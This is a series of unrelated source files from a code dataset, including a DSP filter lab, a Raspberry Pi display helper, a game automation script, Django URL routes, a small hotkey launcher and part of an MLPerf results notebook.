self.get_queryset()\n context = super().get_context_data(**kwargs)\n index_url = self.url_helper.get_action_url(\"history\", quote(self.instance.pk))\n table = Table(\n self.columns,\n context[\"object_list\"],\n base_url=index_url,\n ordering=self.get_ordering(),\n )\n\n context[\"table\"] = table\n context[\"media\"] = table.media\n context[\"index_url\"] = index_url\n context[\"is_paginated\"] = True\n return context\n","repo_name":"wagtail/wagtail","sub_path":"wagtail/contrib/modeladmin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":44351,"program_lang":"python","lang":"en","doc_type":"code","stars":16307,"dataset":"github-code","pt":"95"}
+{"seq_id":"38114674365","text":"# DSP first lab 6 part 2\n# 08/05/2017\n\nimport numpy as np\nfrom numpy import cos, exp, abs, angle # function\nfrom numpy import pi # constant\nimport matplotlib.pyplot as plt\nimport scipy.io\nfrom scipy import signal\n\nplt_n = 0 # for plotting figure increment only\n\nmat = scipy.io.loadmat('files\LAB6DAT.MAT') # load matlab file\n\nprint(\"Available keys in mat file:\")\nprint(mat.keys()) # print all the available keys from mat file; dict_keys(['h2', 'xtv', 'x2', 'h1', 'x1'])\n# print(mat['x1']) # access stored data with a key\n\n# 2.1 (b) polynomial multiplication\np1 = [0, 1, 1/2, -2] # 1st polynomial\np2 = [1, 1, 0, -1/4] # 2nd polynomial\n\np3 = signal.convolve(p1, p2) # convolve = polynomial multiplication = digital filtering\nprint(\"Polynomial Multiplication: \")\nprint(p3) # check result against hand calculation\n\n# 2.1 (c) frequency response of two cascaded systems\nFIR1 = [1/3, 1/3, 1/3, 0, 0] # 3-point average filter\nFIR2 = [1/5, 1/5, 1/5, 1/5, 1/5] # 5-point average filter\n\nFIR3 = signal.convolve(FIR1, FIR2) # cascade two systems\nprint(\"Cascaded FIR filter: \")\nprint(FIR3)\n\nww_start = -3*pi # extend the normalized frequency range beyond -pi to verify the periodicity of frequency response\nww_end = 3*pi # extend the normalized frequency range beyond +pi to verify the periodicity of frequency response\nww_sample_size = 400\nww_step = (ww_end-ww_start)/ww_sample_size\nww = np.arange(ww_start, ww_end, ww_step) # arange(start, stop, step); exclusive of ending\n\nW, H = signal.freqz(FIR3, 1, ww) # (numerator, denominator, frequency range)\n\nH_mag = np.abs(H) # linear scale\nH_phase = np.angle(H, deg=True) # angle in degree\n\nfig = plt.figure(plt_n, figsize=(12, 12), dpi=80, facecolor='w', edgecolor='k')\nfig.suptitle(\"Cascaded FIR filter frequency response\")\n\nax1 = plt.subplot(211)\nax1.set_xlim(ww_start, ww_end)\nax1.set_ylim(0, max(H_mag))\n# ax1.set_xticks(np.arange(ww_start, ww_end, plt_ww_tick))\nax1.set_xlabel('normalized frequency (2*pi*f0/fs)')\nax1.set_ylabel('|H|')\nax1.plot(W, H_mag, 'r--')\nax1.set_title('magnitude response')\n\nax2 = plt.subplot(212)\nax2.set_xlim(ww_start, ww_end)\nax2.set_ylim(-180, 180)\nax2.set_xlabel('normalized frequency (2*pi*f0/fs)')\nax2.set_ylabel('angle(H) in deg')\nax2.plot(W, H_phase, 'b--')\nax2.set_title('phase response')\n\nplt.subplots_adjust(left=0.1, right=0.9, top=0.9, bottom=0.1, hspace=0.3, wspace=0)\n\nplt.show()\n","repo_name":"hongpan0507/Programming","sub_path":"Python/pycharm/DSP_first/Lab6/DSP_first_lab6_part2.py","file_name":"DSP_first_lab6_part2.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"72529349433","text":"class Bonnet():\n def __init__(self, setupDisplay=False, width=240, height=240, 
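# 240x240 is the native resolution of the ST7789 panel configured below\n 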
rotation=180):\n self.height = height\n self.width = width\n self.rotation = rotation\n self.display = None\n self.buttons = {}\n self.setup(setupDisplay=setupDisplay)\n\n # Setup the Display and get a display object\n def setup(self, setupDisplay):\n if setupDisplay:\n import board\n from digitalio import DigitalInOut, Direction\n import adafruit_rgb_display.st7789 as st7789\n\n print(\"Setting up Adafruit st7789 driver...\")\n # Create the display\n cs_pin = DigitalInOut(board.CE0)\n dc_pin = DigitalInOut(board.D25)\n reset_pin = DigitalInOut(board.D24)\n BAUDRATE = 24000000\n\n spi = board.SPI()\n self.display = st7789.ST7789(\n spi,\n width=self.width,\n height=self.height,\n y_offset=80,\n rotation=self.rotation,\n cs=cs_pin,\n dc=dc_pin,\n rst=reset_pin,\n baudrate=BAUDRATE\n )\n # Get the Adafruit 1.3\" TFT Bonnet Buttons\n # Input pins:\n button_A = DigitalInOut(board.D5)\n button_A.direction = Direction.INPUT\n\n button_B = DigitalInOut(board.D6)\n button_B.direction = Direction.INPUT\n\n button_L = DigitalInOut(board.D27)\n button_L.direction = Direction.INPUT\n\n button_R = DigitalInOut(board.D23)\n button_R.direction = Direction.INPUT\n\n button_U = DigitalInOut(board.D17)\n button_U.direction = Direction.INPUT\n\n button_D = DigitalInOut(board.D22)\n button_D.direction = Direction.INPUT\n\n button_C = DigitalInOut(board.D4)\n button_C.direction = Direction.INPUT\n\n self.buttons['A'] = button_A\n self.buttons['B'] = button_B\n self.buttons['LEFT'] = button_L\n self.buttons['RIGHT'] = button_R\n self.buttons['UP'] = button_U\n self.buttons['DOWN'] = button_D\n self.buttons['STICK'] = button_C \n else:\n print(\"Not using Adafruit Driver.\")\n\n def enableBacklight(self, onOff=True):\n # Turn on the Backlight\n if self.display:\n backlight = DigitalInOut(board.D26)\n backlight.switch_to_output()\n backlight.value = onOff\n else:\n print(\"No display setup. 
Unable to set up backlight.\n","repo_name":"antiero/pyowl","sub_path":"display_helpers.py","file_name":"display_helpers.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"705186129","text":"# -*- coding:utf-8 -*-\r\n\r\n\"\"\"\r\nFunction:\r\n\tRemove all equipment carried by every ship.\r\n\r\nUsage:\r\n\tRun standalone (via the \"run script file in a new thread\" button).\r\n\r\nNotes:\r\n\tShips on expedition or in dock can only have their reinforcement-slot equipment removed.\r\n\tThis script does not remove equipment from land-based air squadrons.\r\n\tIf an exclusive-mode configuration is currently running, equipment is removed after it finishes.\r\n\tClick the \"abort current task\" button to stop.\r\n\tThis is a very simple script with no error handling; if something goes wrong, just run it again.\r\n\r\nKnown issues:\r\n\tThe refit feature seems to have trouble selecting ships that are not in any fleet and sometimes gets stuck.\r\n\t\tThat feature was rarely useful before, so nobody cared how well it actually worked; this Python script itself is fine, hence it is published.\r\n\r\nChangelog:\r\n\t20221113 - 1.1\r\n\t\tAdapted to the new API\r\n\t20210614 - 1.0\r\n\t\tInitial version.\r\n\"\"\"\r\n\r\nfrom KancollePlayerSimulatorKaiCore import *\r\n\r\nrefreshDataTask = RefreshDataTask()\r\nrefreshDataTask.Priority += 2 # Two points above the default priority\r\nUtility.AddTask(refreshDataTask) # Refresh the game data first\r\n\r\nslots = (\r\n\tEquipmentSlot.Slot1,\r\n\tEquipmentSlot.Slot2,\r\n\tEquipmentSlot.Slot3,\r\n\tEquipmentSlot.Slot4,\r\n\tEquipmentSlot.Slot5,\r\n\tEquipmentSlot.SlotEx,\r\n)\r\n\r\nshipsState = GameState.Ships() # Optimization: avoid re-fetching state; everywhere this variable is passed could also be left empty, but the state would then be fetched each time, hurting efficiency\r\nequipsState = GameState.Equips() # Optimization: same as above\r\nfleetsState = GameState.Fleets() # Optimization: same as above\r\nrepairsState = GameState.Repairs() # Optimization: same as above\r\n\r\nshipObjs = ShipUtility.All(shipsState)\r\nsortedShipObjs = ShipUtility.SortByLevel(shipObjs) # Optimization: process in level order\r\nsortedShipObjs = list(sortedShipObjs) # Convert to a list\r\nsortedShipObjs.reverse() # From low level to high level\r\nfor shipObj in sortedShipObjs:\r\n\t#if not ShipUtility.ShipLocked(shipObj): # Skip ships that are not locked\r\n\t#\tcontinue\r\n\tequipIds = ShipUtility.AllEquipments(shipObj)\r\n\tif len(list(equipIds)) == 0: # Skip ships with no equipment\r\n\t\tcontinue\r\n\texpeditioning = ShipUtility.Expeditioning(shipObj, fleetsState)\r\n\tdocking = ShipUtility.Docking(shipObj, repairsState) # ShipUtility.Repairing() checks the repair finish time, which is not what we want here\r\n\tif (expeditioning or docking) and ShipUtility.ExtraEquipment(shipObj) == 0: # Skip expedition/docked ships with an empty reinforcement slot\r\n\t\tcontinue\r\n\tshipId = ShipUtility.Id(shipObj)\r\n\tshipReadable = ShipUtility.HumanReadable(shipObj)\r\n\ttarget = {}\r\n\tif expeditioning or docking:\r\n\t\ttarget[EquipmentSlot.SlotEx] = 0\r\n\telse:\r\n\t\tfor slot in slots:\r\n\t\t\tif ShipUtility.SlotAvailable(shipObj, slot): # Only add slots that actually exist, otherwise execution stops at the validation stage\r\n\t\t\t\ttarget[slot] = 0\r\n\trefitTask = SimpleRefitEquipmentTask(shipId, target, shipsState, equipsState)\r\n\trefitTask.Priority += 1 # One point above the default priority\r\n\tUtility.AddTask(refitTask)\r\n\r\nreturnTask = ReturnRoomTask() # Finally, return to the home port\r\nUtility.AddTask(returnTask)\r\n","repo_name":"KanaHayama/KanCollePlayerSimulator","sub_path":"肝帝模拟 改/Python脚本/独立/卸下所有船上装备.py","file_name":"卸下所有船上装备.py","file_ext":"py","file_size_in_byte":3300,"program_lang":"python","lang":"zh","doc_type":"code","stars":68,"dataset":"github-code","pt":"95"}
+{"seq_id":"4803707656","text":"from django.urls import path\r\nfrom django.contrib.auth.decorators import login_required\r\n\r\nfrom .views import (\r\n\r\n\tRegisterPageView,\r\n\tLoginPageView,\r\n\tlogoutUser,\r\n\thomePageView,\r\n\tArticleListView,\r\n\tAuthorListView,\r\n\tAuthorView,\r\n\tArticleView,\r\n\tCreateArticleView,\r\n\tUpdateArticleView,\r\n\tDeleteArticleView,\r\n\tdeleteComment,\r\n)\r\n\r\nurlpatterns = [\r\n\t\r\n\t\r\n\tpath('register/', RegisterPageView.as_view(), name='register-page'),\r\n\tpath('login/', LoginPageView.as_view(), 
name='login-page'),\r\n\t\r\n\tpath('logout/', logoutUser, name='logout-page'),\r\n\t\r\n\tpath('', homePageView.as_view(), name='home-page'),\r\n\t\r\n\tpath('author/', AuthorListView.as_view(), name='authors-page'),\r\n\tpath('author/<int:id>', AuthorView.as_view(), name='author-page'),\r\n\r\n\tpath('article/<int:id>', ArticleView.as_view(), name='article-page'),\r\n\t\r\n\tpath('article/', ArticleListView.as_view(), name='articles-page'),\r\n\tpath('article/create/', login_required(CreateArticleView.as_view(), login_url='login-page'), name='create-article'),\r\n\r\n\tpath('article/update/<int:id>', login_required(UpdateArticleView.as_view(), login_url='login-page'), name='update-article'),\r\n\r\n\tpath('article/delete/<int:id>', login_required(DeleteArticleView.as_view(), login_url='login-page'), name='delete-article'),\r\n\r\n\tpath('article/delete-comment/<int:id>', deleteComment, name='delete-comment'),\r\n\r\n\r\n]","repo_name":"ShoyaAlm/Articles4All-Django-Website","sub_path":"articlesforall/articles/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"31068509882","text":"# This file is part of aoc2016.\n#\n# aoc2016 is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n# \n# aoc2016 is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with aoc2016. If not, see <http://www.gnu.org/licenses/>.\ndef part_one(puzzle_input):\n n_triangles = 0\n for line in puzzle_input.split('\\n'):\n a, b, c = decompose_line(line)\n if is_triangle(a, b, c):\n n_triangles += 1\n\n return str(n_triangles)\n\n\ndef part_two(puzzle_input):\n n_triangles = 0\n input_lines = puzzle_input.split('\\n')\n for line_group in zip(input_lines[::3], input_lines[1::3], input_lines[2::3],):\n line_group = [decompose_line(line) for line in line_group]\n for i in range(3):\n sides = [line[i] for line in line_group]\n if is_triangle(*sides):\n n_triangles += 1\n\n return str(n_triangles)\n\n\ndef is_triangle(a, b, c):\n a, b, c = sorted((a, b, c))\n return a + b > c\n\n\ndef decompose_line(line):\n return list(map(int, line.strip().split()))\n","repo_name":"T-R0D/JustForFun","sub_path":"aoc2016/aoc2016/day03/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"}
+{"seq_id":"74777753593","text":"# Decided against recursion as it would use more memory than the loop,\n# due to having to pass the variables to the function rather than just\n# using them immediately.\n\ndef reverseSentence(splitSentence, reversedString, i): #(1)\n '''Takes a list of strings, an empty string to build into, and the index of\n the last word in the list. Reverses the list and returns the words as a\n single concatenated string.'''\n ## From the end of the list to the beginning. 
Add the item at position i in the\n #list to the new string.\n while i >=0: #(n)\n reversedString = reversedString + splitSentence[i] + \" \" #(n)\n i = i -1 #(n)\n return reversedString #(1)\ninputSentence= input(\"Please input a sentence you would like reversed\") #(1)\n\n\nsplitSentence = inputSentence.split() #(n)\n\n\nreversedString = \"\" #(1)\n\n#finds the amount of words in the list. Takes away one as the list\n#is indexed from 0 so that loop therefore doesn't begin outside of list.\ni = len(splitSentence) -1 #(1)\n\n\nprint(reverseSentence(splitSentence, reversedString, i)) #(1)\n\n#run time: 4n+7\n#big O: O(n)\n\n","repo_name":"Gc0066/210CT-Coursework","sub_path":"Lab Sheet 3/Question 1 (6).py","file_name":"Question 1 (6).py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"25693976045","text":"import logging as log\nimport json\nimport shlex\nfrom typing import Union\nfrom pathlib import Path\nfrom functools import partial\nfrom subprocess import Popen\nfrom pynput import keyboard\nimport click\nfrom voluptuous import MultipleInvalid\n\n# Local module imports\nfrom runslick.validation import CONFIG_SCHEMA\nfrom runslick.hotkey import HotKeyManager\nfrom runslick.prompt import PromptManager\nfrom runslick.incantation import Incantation\n\n# Global logging configuration\nLOG_LEVEL = {'CRITICAL': log.CRITICAL, 'ERROR': log.ERROR, 'WARNING': log.WARNING, 'INFO': log.INFO,\n 'DEBUG': log.DEBUG, 'NOTSET': log.NOTSET}\nlog.basicConfig(format='%(levelname)s - %(module)s.%(funcName)s - [%(asctime)s]: %(message)s')\n\n\ndef configure_logging(log_level: str):\n log.getLogger().setLevel(LOG_LEVEL[log_level])\n\n\ndef load_configuration(config_path: Path):\n log.info(\"Loading configuration: %s\", str(config_path))\n config_data = json.load(config_path.open('r'))\n CONFIG_SCHEMA(config_data)\n log.info(\"Configuration loaded.\")\n return config_data\n\n\ndef load_configuration_or_die(config_path: Path):\n \"\"\"Loads configuration and validates it or exits the application.\"\"\"\n try:\n return load_configuration(config_path)\n except MultipleInvalid as exc:\n log.critical(\"Configuration (%s) parsing error: %s\", str(config_path), str(exc))\n exit(2)\n except json.JSONDecodeError as exc:\n log.critical(\"JSON parsing error when trying to read configuration: %s\", str(config_path))\n exit(2)\n\n\ndef prompt(prompt_manager: PromptManager):\n log.debug(\"Main prompt invoked\")\n result = prompt_manager.run_prompt(\"Run:\")\n log.info(\"User prompt result: %s\", result)\n\n\ndef execute(incantation: Incantation, exec_cmd, prompt_manager=None):\n log.info(\"Executing: %s\", incantation)\n cmd = incantation.concretize(prompt_manager)\n if cmd:\n cmd = shlex.split(exec_cmd) + [cmd]\n log.info(\"Executing: %s\", str(cmd))\n Popen(cmd)\n else:\n log.error(\"Could not concretize incantation: %s\", incantation)\n\n\n@click.command()\n@click.option('--config-file', '-c', type=click.Path(exists=True, file_okay=True, dir_okay=False,\n writable=False, readable=True,\n resolve_path=True, allow_dash=True),\n default=str(Path.cwd() / 'config.json'), help=\"JSON-formatted configuration file, \"\n \"defaults to config.json in the current\"\n \" directory\")\n@click.option('--debug/--no-debug', default=False)\ndef main(config_file: Union[Path, str], debug: bool):\n '''A highly configurable hotkey launcher for programs based on slickrun but for Linux/Mac'''\n config_file = Path(config_file)\n if debug:\n 
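# Raise verbosity before the configuration file is parsed, so the parsing itself gets logged.\n 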
configure_logging('DEBUG')\n log.debug("Logging level set to debug")\n config = load_configuration_or_die(config_file)\n terminal_cmd = config['service']['terminal']\n open_cmd = config['service']['open']\n\n log.debug("Initializing hotkey and prompt managers...")\n hkm = HotKeyManager()\n prompt_manager = PromptManager()\n # register primary hotkey to prompt for magic word\n hkm.register(config['service']['hotkey'], partial(prompt, prompt_manager))\n # register magic words as hotkeys and prompt-commands\n for magic_word, info in config[\"magic_words\"].items():\n log.debug(\"%s: %s\", magic_word, info) # use lazy %-formatting; passing info as a bare extra argument breaks when the record is emitted\n if 'terminal' in info and info['terminal'] is True:\n prompt_manager.register_action(magic_word, partial(execute,\n Incantation(magic_word,\n info['incantation']),\n terminal_cmd,\n prompt_manager=prompt_manager))\n if 'hotkey' in info:\n hkm.register(info['hotkey'], partial(execute,\n Incantation(magic_word,\n info['incantation']),\n terminal_cmd,\n prompt_manager=prompt_manager))\n else:\n prompt_manager.register_action(magic_word, partial(execute,\n Incantation(magic_word,\n info['incantation']),\n open_cmd,\n prompt_manager=prompt_manager))\n if 'hotkey' in info:\n hkm.register(info['hotkey'], partial(execute,\n Incantation(magic_word,\n info['incantation']),\n open_cmd,\n prompt_manager=prompt_manager))\n log.debug(\"Hotkey manager initialized, listening for shortcuts...\")\n # Collect events until released\n with keyboard.Listener(on_press=hkm.on_press, on_release=hkm.on_release) as listener:\n listener.join()\n","repo_name":"Abraxos/runslick","sub_path":"runslick/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":5492,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"}
+{"seq_id":"37037461248","text":"import dash_bootstrap_components as dbc\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom datetime import datetime, timedelta\nimport math\n\n\nnow = datetime.now()\nyear = now.year\nnow_minus_90 = now - timedelta(90)\nprevious_quarter = f'{now.year}-Q{math.ceil(now_minus_90.month/3)}'\nthis_quarter = f'{now.year}-Q{math.ceil(now.month/3)}'\n\n\ntime_periods = [\n f'{year - 1}-Annual',\n f'{year}-Q1',\n f'{year}-Q2',\n f'{year}-Half-Yearly',\n f'{year}-Q3',\n f'{year}-Q4',\n f'{year}-Annual'\n]\n\nperiod_dict = {\n f'{year - 1}-Annual': (f'01-01-{year-1}', f'12-31-{year-1}'),\n f'{year}-Q1': (f'01-01-{year}', f'03-31-{year}'),\n f'{year}-Q2': (f'04-01-{year}', f'06-30-{year}'),\n f'{year}-Q3': (f'07-01-{year}', f'09-30-{year}'),\n f'{year}-Q4': (f'10-01-{year}', f'12-31-{year}'),\n f'{year}-Half-Yearly': (f'01-01-{year}', f'06-30-{year}'),\n f'{year}-Annual': (f'01-01-{year}', f'12-31-{year}')\n}\n\n\ndef create_danger_alert(message, dismissable=False):\n return dbc.Alert(message, color=\"danger\", dismissable=dismissable)\n\n\nalert = dbc.Alert(\"No metrics data XLSX. 
Please contact EQA Support\",\n color=\"danger\",\n dismissable=False)\n\n\nselect_quarter = dbc.FormGroup(\n [\n dbc.Label(\"Select Timeperiod\"),\n dcc.Dropdown(\n id=\"quarter-selector\",\n options=[\n {\"label\": t, \"value\": t}\n for t in time_periods\n ],\n value=this_quarter,\n ),\n ]\n)\n\n\nselect_dropdown_card = dbc.Card(\n [\n dbc.CardBody(\n [\n html.Div(id=\"the_alert\", children=[],\n style={\n 'margin-bottom': '10px'\n }),\n select_quarter,\n html.Hr(),\n ]\n ),\n ],\n color=\"light\",\n)\n\nlayout = dbc.Container(\n [\n html.H1(\"EQA Automation-Team Dashboard\",\n style={\n 'textAlign': 'center',\n 'color': '#ad5555'\n }),\n html.Hr(),\n\n dbc.Row(\n [\n dbc.Col(select_dropdown_card, md=6,\n width={\"size\": 6, \"offset\": 3})\n ],\n ),\n dbc.Row(\n [\n dbc.Col(dcc.Graph(id=\"list_of_projects\"), md=12),\n ]\n ),\n dbc.Row(\n [\n dbc.Col(dcc.Graph(id=\"all_proj_hours\"), md=12),\n ]\n ),\n dbc.Row(\n [\n dbc.Col(dcc.Graph(id=\"type_pie\"), md=6),\n dbc.Col(dcc.Graph(id=\"num_proj_bar\"), md=6),\n ]\n ),\n html.Hr(),\n html.H2(\"Number Of Scripts Developed\",\n style={\n 'textAlign': 'center',\n 'color': '#ad5555'\n }),\n dbc.Row(\n [\n dbc.Col(dcc.Graph(id=\"num_of_scripts\"), md=12),\n ]\n ),\n dbc.Row(\n [\n dbc.Col(dcc.Graph(id=\"script_count_table\"), md=6)\n ],\n justify=\"center\",\n ),\n ],\n fluid=True,\n)\n","repo_name":"sridharaiyer/eqa-dash","sub_path":"layout.py","file_name":"layout.py","file_ext":"py","file_size_in_byte":3167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"7601302407","text":"T = int(input())\nfor tc in range(T):\n n, m = map(int, input().split()) # number of documents, idx of the document we are interested in\n file = list(map(int, input().split()))\n\n q = [] # the document idx is needed later, so store it together with the priority\n for i in range(n):\n q.append([file[i], i])\n\n v = [0] * n # list recording the order in which each document is printed\n\n cnt = 0\n while q:\n a = q.pop(0)\n cnt += 1 # record the order in which this document was removed\n v[a[1]] = cnt\n\n for i in range(len(q)):\n if q[i][0] > a[0]: # if anything has higher priority, re-append this one and roll cnt back\n q.append(a)\n cnt -= 1\n v[a[1]] = 0\n break\n\n print(v[m])","repo_name":"zoyul/algorithm","sub_path":"baekjoon/1966_프린터큐.py","file_name":"1966_프린터큐.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"}
+{"seq_id":"2855690428","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # [MLPerf Inference Results v0.5](https://github.com/mlperf/inference/tree/master/v0.5)\n# ## Automatic results table generation (c) [dividiti](http://dividiti.com/)\n\n# ## Includes\n\n# In[ ]:\n\n\nimport os\nimport re\nimport json\nfrom pprint import pprint\n\n\n# In[ ]:\n\n\nimport IPython as ip\nimport pandas as pd\nimport numpy as np\nimport matplotlib as mp\n# import seaborn as sb\n\n\n# In[ ]:\n\n\nprint ('IPython version: %s' % ip.__version__)\nprint ('Pandas version: %s' % pd.__version__)\nprint ('NumPy version: %s' % np.__version__)\nprint ('Matplotlib version: %s' % mp.__version__)\n# print ('Seaborn version: %s' % sb.__version__)\n\n\n# In[ ]:\n\n\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nget_ipython().run_line_magic('matplotlib', 'inline')\n\ndefault_dpi = 300\ndefault_fontsize = 12\nmp.rcParams['figure.dpi'] = default_dpi\nmp.rcParams['font.size'] = default_fontsize\n\n\n# In[ ]:\n\n\nfrom IPython.display import Image, display\ndef display_in_full(df):\n pd.options.display.max_columns = len(df.columns)\n pd.options.display.max_rows = len(df.index)\n display(df)\n\n\n# ## Definitions\n\n# 
### Path to the repository with results\n\n# In[ ]:\n\n\n# Clone the results directory:\n# git clone https://github.com/mlperf/inference_results_v0.5 <results_path>\n# or\n# git clone https://github.com/dividiti/inference_results_v0.5 <results_path>\n# results_path = '/home/anton/projects/mlperf/inference_results_v0.5_dividiti'\nresults_path = '/home/anton/projects/mlperf/inference_results_v0.5_plus'\n\n\n# ### Path to the cache\n\n# In[ ]:\n\n\ncache_name = 'mlperf-inference-v0.5-results.zip'\ncache_compression = 'zip'\ncache_protocol = 2 # Supported since Python 2.3\n\nimport ck.kernel as ck\nrepo_uoa = 'ck-mlperf'\nmodule_uoa = 'module'\ndata_uoa = 'mlperf.inference'\nr = ck.access({'action':'find', 'repo_uoa':repo_uoa, 'module_uoa':module_uoa, 'data_uoa':data_uoa})\nif r['return']>0:\n print('Error: %s' % r['error'])\n exit(1)\ncache_path = os.path.join(r['path'], cache_name)\ncache_path\n\n\n# ### Divisions\n\n# In[ ]:\n\n\ndivisions = [ 'closed', 'open' ]\n\n\n# ### Maps for DataFrame construction\n\n# In[ ]:\n\n\n# Lowercase or camelcase or camelcase with space to camelcase.\nscenario_to_str = {\n # SingleStream.\n 'singlestream' : 'SingleStream',\n 'SingleStream' : 'SingleStream',\n 'Single Stream' : 'SingleStream',\n # MultiStream.\n 'multistream' : 'MultiStream',\n 'MultiStream' : 'MultiStream',\n 'Multi Stream' : 'MultiStream',\n # Server.\n 'server' : 'Server',\n 'Server' : 'Server',\n # Offline.\n 'offline' : 'Offline',\n 'Offline' : 'Offline',\n}\n\n\n# In[ ]:\n\n\ndivision_to_str = {\n # Open.\n 'open' : 'Open',\n 'Open' : 'Open',\n # Closed.\n 'closed' : 'Closed',\n 'Closed' : 'Closed'\n}\n\n\n# In[ ]:\n\n\n# dividiti-specific.\nsystem_id_to_processor = {\n 'firefly' : 'Rockchip RK3399',\n 'hikey960' : 'HiSilicon Kirin960',\n 'mate10pro' : 'HiSilicon Kirin970',\n 'rpi4' : 'Broadcom BCM2711B0',\n}\n\n\n# In[ ]:\n\n\naccelerator_name_to_accelerator = {\n 'NVIDIA Tesla T4': 'NVIDIA Tesla T4',\n 'Nvidia Tesla T4': 'NVIDIA Tesla T4',\n 'Tesla T4': 'NVIDIA Tesla T4',\n 'Nvidia Tesla V100 SXM3': 'NVIDIA Tesla V100 SXM3',\n 'tpu-v3.8': 'Google TPU v3-8', # NB: 8 TPU v3?\n 'HanGuang 800': 'Alibaba HanGuang 800',\n 'Goya': 'Habana Goya',\n}\n\n\n# ### Metrics for DataFrame construction\n\n# In[ ]:\n\n\n# Performance metrics: Stream in ms; MultiStream in #streams; Server in QPS; Offline in inputs/s).\nperformance_columns = [\n 'P_{}_{}'.format(task, scenario)\n for task in ['IC1','IC2','OD1','OD2','NMT'] \n for scenario in ['SS','MS','S','O']\n]\n# Accuracy metrics: Image Classification in Top1, %; Object Detection in mAP, %; Machine Translation in BLUE.\naccuracy_columns = [\n 'A_{}_{}'.format(task, scenario)\n for task in ['IC1','IC2','OD1','OD2','NMT']\n for scenario in ['SS','MS','S','O']\n]\n# Score columns.\nscore_columns = performance_columns + accuracy_columns\n\n\n# ### Non-imagenet benchmarks\n\n# In[ ]:\n\n\nnon_imagenet_benchmarks = {\n # Non-ImageNet benchmarks from the closed division.\n 'ssd-small': {\n \"name\" : \"SSD-MobileNet-v1\",\n \"width\" : 300,\n \"height\": 300,\n },\n 'ssd-large': {\n \"name\" : \"SSD-ResNet34\",\n \"width\" : 1200,\n \"height\": 1200,\n },\n 'gnmt' : {\n \"name\" : \"GNMT\",\n \"width\" : -1,\n \"height\": -1,\n },\n # Non-ImageNet benchmarks from the open division.\n 'rcnn-nas-lowproposals' : {\n \"name\" : \"Faster-RCNN-NAS lowproposals\",\n \"url\" : \"http://download.tensorflow.org/models/object_detection/faster_rcnn_nas_lowproposals_coco_2018_01_28.tar.gz\",\n \"width\" : 1200,\n \"height\" : 1200,\n },\n 'rcnn-resnet50-lowproposals' : 
{\n \"name\" : \"Faster-RCNN-ResNet50 lowproposals\",\n \"url\" : \"http://download.tensorflow.org/models/object_detection/faster_rcnn_resnet50_lowproposals_coco_2018_01_28.tar.gz\",\n \"width\" : 1024,\n \"height\" : 600,\n },\n 'rcnn-resnet101-lowproposals' : {\n \"name\" : \"Faster-RCNN-ResNet101 lowproposals\",\n \"url\" : \"http://download.tensorflow.org/models/object_detection/faster_rcnn_resnet101_lowproposals_coco_2018_01_28.tar.gz\",\n \"width\" : 1024,\n \"height\" : 600,\n },\n 'rcnn-inception-resnet-v2-lowproposals' : {\n \"name\" : \"Faster-RCNN-Inception-ResNet-v2 lowproposals\",\n \"url\" : \"http://download.tensorflow.org/models/object_detection/faster_rcnn_inception_resnet_v2_atrous_lowproposals_coco_2018_01_28.tar.gz\",\n \"width\" : 1024,\n \"height\" : 600,\n },\n 'rcnn-inception-v2' : {\n \"name\" : \"Faster-RCNN Inception-v2\",\n \"url\" : \"http://download.tensorflow.org/models/object_detection/faster_rcnn_inception_v2_coco_2018_01_28.tar.gz\",\n \"width\" : 1024,\n \"height\" : 600,\n },\n 'ssd-inception-v2' : {\n \"name\" : \"SSD-Inception-v2\",\n \"url\" : \"http://download.tensorflow.org/models/object_detection/ssd_inception_v2_coco_2018_01_28.tar.gz\",\n \"width\" : 300,\n \"height\" : 300,\n },\n 'ssd-mobilenet-v1-quantized-mlperf' : {\n \"name\" : \"SSD-MobileNet-v1\",\n \"url\" : \"https://zenodo.org/record/3361502/files/ssd_mobilenet_v1_coco_2018_01_28.tar.gz\",\n \"width\" : 300,\n \"height\" : 300,\n \"provenance\" : \"Google\",\n },\n 'ssd-mobilenet-v1-non-quantized-mlperf' : {\n \"name\" : \"SSD-MobileNet-v1 quantized\",\n \"url\" : \"https://zenodo.org/record/3252084/files/mobilenet_v1_ssd_8bit_finetuned.tar.gz\",\n \"width\" : 300,\n \"height\" : 300,\n \"provenance\" : \"Habana\"\n },\n 'ssd-mobilenet-v1-fpn' : {\n \"name\" : \"SSD-MobileNet-v1 FPN SBP\",\n \"url\" : \"http://download.tensorflow.org/models/object_detection/ssd_mobilenet_v1_fpn_shared_box_predictor_640x640_coco14_sync_2018_07_03.tar.gz\",\n \"width\" : 640,\n \"height\" : 640,\n },\n 'ssd-resnet50-fpn' : {\n \"name\" : \"SSD-ResNet50-v1 FPN SBP\",\n \"url\" : \"http://download.tensorflow.org/models/object_detection/ssd_resnet50_v1_fpn_shared_box_predictor_640x640_coco14_sync_2018_07_03.tar.gz\",\n \"width\" : 640,\n \"height\" : 640,\n },\n 'ssdlite-mobilenet-v2' : {\n \"name\" : 